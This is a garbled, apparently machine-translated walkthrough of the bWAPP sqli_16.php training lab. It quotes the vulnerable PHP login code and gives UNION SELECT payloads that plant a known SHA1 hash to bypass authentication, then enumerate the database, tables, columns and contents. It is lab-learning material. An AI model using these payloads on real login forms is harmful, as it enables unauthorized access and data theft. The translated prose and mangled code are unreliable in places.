SQL injection (Login form/user), this injection really let me crash, said the single quotation mark error, the corresponding change SQL statement, but it does not work, and then help around the Daniel, he said this seems different, once seemed to be a CTF problem, and the general SQL injection is not the same, but the moment can not think how to show, and then finally thought up, and then took me a meal operation, finally understand what is going on.
It's all about starting with the code, looking at the code first:
Starting from the second line, $login parameters receive incoming login, $password receive incoming password,sqli ($password) This is difficult to set up, here is no use, and then password use SHA1 way hash, Then is the SQL query statement, only queried the login, followed by the 15th row $recordset to connect the database and use $SQL query statement, in the IF, else statement of the else part, the 23rd row $row out the query results of a set as an associative array, this is very important, There is also the following point, the judgment sentence of line 25th "if ($row [" Login "] && $password = = $row [" password "])", here to make $row["login" is true and $password = = $row [" Password "]), how to do this, there is a method, $row [" login "] is not $login, but the query is stored in the $row login value, the 9th line $passwrod and hash value as long as $row[" password "]), So the SQL statement can be constructed, the problem here is that you do not know the number of fields and login and password corresponding to the location of the field, so we need to combine the black and white boxes, open the database query fields and location, (the code is attached at the end):
Can see password in the third field, we let password value of "1", online MD5, find SHA1 corresponding hash value "356a192b7913b04c54574d18c28d46e6395428ab", Start constructing the query statement and enter "
Form=submit
&login= ' Union Select, ' 356a192b7913b04c54574d18c28d46e6395428ab ', 4,5,6,7,8,9 #+
&password=1
", the result
Then the reason: "' Union Select," "356a192b7913b04c54574d18c28d46e6395428ab", 4,5,6,7,8,9 #+ "assigned to login, $sql became" $sql = " SELECT * FROM users WHERE login = ' "' Union Select", "356a192b7913b04c54574d18c28d46e6395428ab", 4,5,6,7,8,9 #+ "'"; So $recordset search from the database has a return value, that is $row["login"] return is not empty, here the first condition is constituted. After post "&password=1", 1 of the value of the hash is added to the union query statement, so that the returned display has 1 hash value, that is, the returned query has 1 hash value, so $row["password"] The value is the hash value of 1 that we passed into the password position, so that the value of $password is equal to $row["password", so the 25th line of the If Judgment statement is true, is not very interesting.
Here's the normal SQL query, and I'll follow it again.
1, query database and other information:
Enter "login=" union Select 1,GROUP_CONCAT (Database (), "| |", version (), "| |", user ()), " 356a192b7913b04c54574d18c28d46e6395428ab ", 4,5,6,7,8,9 #+", results
2. Query Table name:
Enter "login=" union Select 1,GROUP_CONCAT (Database (), "| |", version (), "| |", user ()), " 356a192b7913b04c54574d18c28d46e6395428ab ", 4,table_name,6,7,8,9 from Information_schema.tables where table_schema= ' Bwapp ' #+ ', you can see the table named "Blog" and there is a "Wapp" database, you can try it yourself, the results
3. Query Field Name:
Enter "login=" union Select 1,GROUP_CONCAT (Database (), "| |", version (), "| |", user ()), " 356a192b7913b04c54574d18c28d46e6395428ab ", 4,column_name,6,7,8,9 from Information_schema.columns where Table_name= ' Blog ' #+ ', results
4, query the contents of the field:
Enter "login=" union Select 1,GROUP_CONCAT (Database (), "| |", version (), "| |", user ()), " 356a192b7913b04c54574d18c28d46e6395428ab ", 4,id,6,7,8,9 from Blog #+".
Some of the code is as follows:
<?php if (isset ($_post["form")) {$login = $_post["Login"]; $login = Sqli ($login); $password = $_post["password"]; $password = Sqli ($password); $password = Hash ("SHA1", $password, false); $sql = "SELECT * from users WHERE login = '". $login. "‘"; Echo $sql; $recordset = mysql_query ($sql, $link); if (! $recordset) {die ("Error:". Mysql_error ()); } else {$row = mysql_fetch_array ($recordset); if ($row ["Login"] && $password = = $row ["password"]) {//$message = "<font color=\" GRE En\ ">welcome". Ucwords ($row ["Login"]). "...</font>"; $message = "<p>welcome <b>". Ucwords ($row ["Login"]). "</b>, How is today?</p><p>your secret: <b>". Ucwords ($row ["secret"]). "</b></p>"; $message = $row ["Login"]; } ELSE {$message = "<font color=\" red\ ">invalid credentials!</font>"; }} mysql_close ($link); } echo $message;? >
Bwapp of SQL injection sqli_16.php